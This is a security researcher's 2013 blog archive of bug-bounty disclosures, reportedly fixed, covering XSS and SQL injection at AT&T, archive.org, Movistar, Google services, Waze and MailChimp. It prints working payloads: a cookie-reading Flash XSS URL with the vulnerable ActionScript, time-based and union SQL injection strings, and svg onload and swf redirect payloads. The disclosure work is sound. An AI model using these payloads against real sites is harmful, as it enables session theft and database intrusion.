
Showing posts from 2013

Dangerous Persistent XSS at Here.com [FIX]

Here.com is a Nokia business unit that brings together Nokia's mapping and location assets under one brand. The technology of Here is based on a cloud-computing model, in which location data and services are stored on remote servers so that users have access to them regardless of which device they use. HERE Map Creator is a service launched by Nokia in November 2012 to allow users to map their neighborhood.

With this bug I could SAVE a road name with a payload on the map. Any user who tries to re-edit the street name will get this XSS. I reported a similar bug to Waze.com a few months ago.

Nokia Response:

Thanks to Nokia for starting this bug bounty program.

FLASH XSS AT ATT.COM [FIX]

I found a Flash XSS on the AT&T main domain where an attacker could steal users' credentials.

Vuln URL: http://www.att.com/media/en_US/scripts/JSAM/JSAM_VideoPlayer.swf?completeHandler=JSAM.flashCompleteHandler);}catch(e) {alert(document.cookie);}//&source=https://www.wireless.att.com/home/video_progressive/video_marquees/B2CNDA-24-emerald-hp-marquee-bkd.mp4

Payload: JSAM.flashCompleteHandler);}catch(e) {alert(document.cookie);}//

Flash Vuln Code:

    public function videoPlayer_completeHandler(_arg1:VideoEvent):void {
        if (ExternalInterface.available) {
            // completeHandler is taken from the query string / flashvars and passed
            // unvalidated to the browser, so its value is evaluated as JavaScript
            ExternalInterface.call(completeHandler, ExternalInterface.objectID);
        } else {
            trace("JSAM_VideoPlayer cannot call completeHandler because ExternalInterface is not available.");
        };
    }

Proof:

After 2 months AT&T Response:

I hope to be on the top 10 Award :)

SQL Injection at Movistar.es [FIX]

Movistar is a major Spanish mobile phone operator owned by Telefónica S.A., operating in Spain and in many Latin American countries. It is the largest carrier in Spain with 22 million customers (cellphone services only).

I found this MSSQL injection. By adding ' WAITFOR DELAY '0:0:20'-- I got a positive response with a 20-second delay, proving that the SEOname parameter is vulnerable to SQL INJECTION. I reported this to Movistar and they replied and FIXED it quickly :) Great job Movistar!

SQL Injection at archive.org [Fix]

The Internet Archive allows the public to upload and download digital material to its data cluster, but the bulk of its data is collected automatically by its web crawlers, which work to preserve as much of the public web as possible. Its web archive, the Wayback Machine, contains over 150 billion web captures.

Looking at archive.org I found a cool MySQL injection on the user panel, using " and "1"="1"# instead of ' and '1'='1'#. I did this by updating my nickname to 1" and "1"="1" union select version(0)#, getting the MySQL version successfully.

Vulnerable URL: https://archive.org/account/?screenname=1"+and+"1"="1"+union+select+version(0)#&action=change-screenname&submit=Change

I reported this to archive.org and never got a reply. After 4 months they fixed it.

Proof:

A simple thank you would be nice.

SQL Injection in Apple and Ubuntu - Apology emails...

This week I got two emails, one from Apple and another one from Ubuntu, saying: -- Now all users have to change their passwords. Even I... Maybe in the future they will care more about their security. This is why all companies should have a Bug Bounty Program.

Highly XSS at Google Hangouts (Reward)

First of all I'd like to say this XSS is stored on a Google "sandbox" and it is impossible to grab cookies. But it is possible to send it to another user using "Google Art Project Add-ons" at https://plus.google.com/hangouts/_/ .

Hangouts allows users to hold conversations between two or more users. The service can be accessed online through the Gmail or Google+ websites, or through mobile apps available for Android and iOS (which were distributed as a successor to their existing Google Talk apps). This persistent XSS can be more significant than other types because an attacker's malicious script is rendered automatically when a modified art project is shared to the victim using Hangouts add-ons (as shown below). (This is an interactive chat and can easily be used by anyone.)

I first modify the Art Project I want to inject at http://www.google.com/culturalinstitute/project/art-project?hl=en

Then using Google Art Project Add-

Google paid me $3.133 USD!!

Finally! I found the bug I was looking for!! Last week, looking at sketchup.google.com, I found a Flash file vulnerable to XSS at the eventHandler parameter; with this it was possible to get a positive XSS :)

Google Response:

This is my first big reward and I'm happy as. I'd like to thank Google for starting this program.

Report: Fri, Jul 5, 2013 at 2:13 PM
Fix: Tue, Jul 9, 2013 at 9:00 AM

Dangerous XSS Persistent at Waze.com

Waze is currently using its second generation map editing interface. Known as the Waze Map Editor (or WME for short), it has been the default editor for Waze since September 19, 2011. This editor interface is internally code-named "Papyrus", and was functionally upgraded on April 21, 2013.

When adding an alternate city and street name it was possible to inject a nice XSS. If I saved it in the editor, all users who clicked on the street got the XSS.

Google Response:

Next time I will wait 6 months :)

Report: Wed, Jun 26, 2013 at 7:53 PM
Fix: Tue, Jul 02, 2013 at 9:00 PM

Swf file Preview at googlegroups.com

Today, looking at googlegroups.com, I found that when uploading an swf file I could preview the file on the server, triggering bugs like XSS, redirection and HTTP requests.

XSS proof: https://anon4v.googlegroups.com/attach/ad95b6883d02ee92/xss.swf?gda=--h2a0cAAAAf1aJvtdZvL0V0Vur0XewTV1qzvAInIaFKdkrbn96pkZ1koWdz85XW-WM6SHiL84IbQwFxJw55cVwemAxM-EWmeV4duv6pDMGhhhZdjQlNAw&c=alert(document.cookie)&a=eval&view=1&part=4

Redirection proof: https://anon4v.googlegroups.com/attach/ad95b6883d02ee92/xss.swf?gda=--h2a0cAAAAf1aJvtdZvL0V0Vur0XewTV1qzvAInIaFKdkrbn96pkZ1koWdz85XW-WM6SHiL84IbQwFxJw55cVwemAxM-EWmeV4duv6pDMGhhhZdjQlNAw&a=location&c=http://www.paypal.com/&view=1&part=4

HTTP request to URL proof: https://anon4v.googlegroups.com/attach/ad95b6883d02ee92/xss.swf?gda=--h2a0cAAAAf1aJvtdZvL0V0Vur0XewTV1qzvAInIaFKdkrbn96pkZ1koWdz85XW-WM6SHiL84IbQwFxJw55cVwemAxM-EWmeV4duv6pDMGhhhZdjQlNAw&a=get&c=http://www.webcrea.cl/&view

On the Wall of Fame of SproutSocial

Nice, I'm on the Wall of Fame of SproutSocial.com: http://sproutsocial.com/responsible-disclosure-policy

Reward from Bugcrowd for Beta015 and Beta016!

Nice, I got a reward from Bugcrowd for Beta015 and Beta016! Thanks Bugcrowd.

Google Webchat | Cross Site Scripting Vulnerability

I found out that fiber.google.com was using a third-party app at fiber-chat.com:8443/googlechat/, similar to FastPath Webchat, which has multiple XSS. It turned out that the email parameter was vulnerable to XSS: test@gmail.com"><svg/onload=alert(1)>

When logging off the chat I got a positive XSS response. I reported this to the Google Security Team and the response was this:

Report: Tue, Jun 18, 2013 1:34 PM
Fix: Wed, Jun 19, 2013 9:00 AM

No reward for this bug.

XSS at us7.admin.mailchimp.com and help.mailchimp.com

I found an XSS at us7.admin.mailchimp.com and another Flash XSS at help.mailchimp.com.

Report: Mon, Jun 17, 2013 at 12:46 AM
Fix: Tue, Jun 18, 2013 at 9:00 AM